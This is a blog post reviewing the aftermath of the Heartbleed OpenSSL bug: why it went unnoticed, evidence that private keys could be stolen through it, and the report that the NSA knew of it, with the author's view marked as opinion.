Last week during the Heartbleed chaos I wrote two articles, one outlining how to stay safe and the other explaining what heartbleed actually is. As we enter this week it is clear that we are far from out of the woods, indeed I will shortly explain why Heartbleed is going to be around for some time to come, but now that a great deal of patching and password re-setting has occurred it seems like a good time to reflect on a few of the recent revelations. From the accusations that NSA had Heartbleed for several years and put the Internet community to massive risk to proof of just how much damage Heartbleed could do (a topic of debate amongst experts last week, despite all agreeing it was ‘bad’) in this article I will review the latest developments and what it means to you.
How did all this Heartbleed begin?
I’ve received many questions asking exactly this over the weekend. As I covered in my previous article this is a software defect (not a virus) and unfortunately there is, and likely never will be a state of 100% security. Humans make mistakes and technology is far from infallible. That said, in the grand scheme of bugs this one was relatively obvious (at least when compared to the difficulty of finding vulnerabilities and writing exploits on a modern Windows 8.1 system with all the enhanced anti-exploit mitigations). There are lots of tools and processes that would have turned up such a fault very quickly, yet it went unnoticed for an extended period of time and was adopted in to a staggeringly large number of places. Indeed, given the nature of the OpenSSL software (providing crypto services) and the very widespread use I would genuinely argue that this software should be on the ‘critical national infrastructure’ list for most nations around the world. Given these facts some have argued that it was an intentional plant (despite the insistence of the programmer who made the mistake to the contrary) but I entirely disagree with this. null . So how exactly did we end up with such a ‘basic’ bug in such important software (with all due respect to Neel Mehta who does great work and was diligently looking for such flaws – this is not to downplay the discovery of this significant flaw!)?
The OpenSSL project is open source, which means that the code is available for anyone to review and for those handy with code to contribute to. There is a long standing debate about the merit of open source vs commercial closed source solutions (I am an advocate of both models in different scenarios) but null in that anyone can go and check it out and make sure the code works well. Unfortunately, as this bug demonstrates, this often translates to a lot of people assuming the code is safe and not actually going and checking it. You can see the thought process of every person adopting it “well, this is open source so I am sure lots of really smart people have poured over this code and it is to be trusted”. Unfortunately, the project is very under funded and reviewed given the critical role it plays. The OpenSSL team take donations (with sponsors able to donate up to $50,000) but during the Heartbleed crisis they took a record breaking $841. Their yearly operating budget is reportedly less than 1M$ a year and the due diligence, code review and analysis (tools and people) that would have found such problems cost money and time. The answer therefore as to who is to blame for this fault is us, the Internet community. Whilst the technology we use is rapidly evolving, blurring open and commercial lines and being weaved and mashed together we need to take stock and identify the critical infrastructure and code that we all depend on and insure it is appropriately invested in. If you are in a position to help and depend on this code, you may want to consider donating to OpenSSL or other projects that drive for code quality like Bug Bounty. You may also want to ask yourself the question, null
This is certainly not the first bug like this (though this was one of the more painful ones) and it is very unlikely to be the last — we should all learn our lessons before next time. As I covered in this SANS institute webcast with Jake Williams and Dr. Johannes Ulrich this defect will have many (security researchers and cyber criminals) pouring over this code looking for other such problems – it is a question of when, not a question of if more defects will be found. Whilst much of the public Internet has now patched, this code is integrated in to a huge number of places many of which change infrequently. It is stockpiled in the firmware of many hardware devices like consumer routers, integrated in to medical devices that never see the Internet to update and even in critical control environments like utilities. It is clearly going to take some time to tidy this mess, which is precisely why we should learn our lessons before they become more painful.
The Proof Heartbleed Can Do Real Damage
Throughout last week there was a great deal of debate amongst experts as to how much information could really be extracted using the Heartbleed flaw. Whilst everyone agreed it was a nasty fault and that information could be grabbed from memory opinions varied on what kind of information could be extracted. The Heartbleed flaw, as I outlined in my original article, enables you to retrieve a small amount of information from the remote servers memory [Technical nerdy awesome bit: you can retrieve about 64kb of memory from the area of memory known as the heap near the bottom of memory which is used for relatively long standing memory operations of processes compared to the stack. It is divided in to chunks which contain information organised and collected by their recent use and processes using various schemes. Different operating systems use different schemes (or in some cases developers implement their own approach, as per one FreeBSD example for OpenSSL. What you get from memory depends on your position in memory at that time and what was recently handled and is stored in memory nearby]. Retrieving memory using heartbleed is relatively easy, but retrieving useful or interesting information is a lot like jumping on to a trampoline whilst throwing a dart blindly at a dart board and hoping you hit the bullseye. Luckily, you get lots and lots of attempts at this operation and sooner or later it is likely to land you something. Using this method you can retrieve usernames, passwords or session IDs (used to separate your connection to Facebook from another logged in user) which means recently logged in users may have their details exposed if they still reside in memory and an attacker launches a Heartbleed assault. The more scary scenario is the theft of ‘private keys’ from memory. These are the special secret that a web server uses to encrypt and protect your information in transit – whether it is your Internet banking or log in to a social media site. If an attacker could retrieve these then they could continue intercepting users traffic (for example, from this coffee shop where I am now sat) to that site and spying on them even after Heartbleed was patched. This is why the steps to fix heartbleed I outlined include creating a new private key and certificate – it is safer to assume they have been stolen. In an innovative move, last week Cloudflare set up a challenge server which was intentionally vulnerable to Heartbleed and challenged the Internet community to steal the private keys (and prove it!). This is exactly what happened and at the time of writing already two different users have retrieved the keys (and a lot of other users stealing password hashes and other sensitive data).
In short, using a variety of methods and a bit of pot luck it is possible under certain conditions to steal keys which would allow an attacker to decrypt user information going forwards (and backwards if they had a copy of it) which entirely validates the steps to fix heartbleed including key regeneration.
Did The NSA Have, Use And Fail To Notify The Public About Heartbleed For Years?
Lastly, Bloomberg reported that the NSA had access to the Heartbleed vulnerability for an extended period of time prior to the public disclosure. This aligns with many of the theories floating amongst security professionals after the ‘NSA revelations’ of the last 18 months. It is certainly possible that intelligence agencies (not just the NSA) had access to such a vulnerability and were systematically using it for some time. That said, Bloomberg doesn’t cite a source (as yet) and the announcement has been met with some of the fastest and most strongly worded rejections from the NSA and ODNI (Office of the Director of National Intelligence). In most scenarios a ‘no comment’ is a typical response, but this fast and outright denial seems atypical. I personally suspect that is because they genuinely did not know about it as opposed to lying about it and trying to cover it up (I could be wrong, I have no proof, it is entirely opinion). What is it that makes me hold this opinion? Simply put, the level of damage on an international scale such a bug could do. Whilst such agencies have a directive towards collecting intelligence they also have a duty to protect. Any such vulnerability would likely have been through a risk assessment in which the intelligence value versus the potential damage would have been weighed up and I would find it surprising if the choice was made to keep it a secret rather than remediate it. I am sure (as seems to be the case with most NSA related theories of late) more information will come to light shortly, but for now I’m sticking to it being less likely in this instance.
That is it for this weeks summary on Heartbleed. It certainly looks like the number of systems still vulnerable (on the public Internet) is rapidly reducing and new security topics are likely to take the headlines soon. Given the news of vulnerable routers however I suspect we will be seeing this flaw for quite some time. If you have any questions please leave a comment or ask me on Twitter, @jameslyne.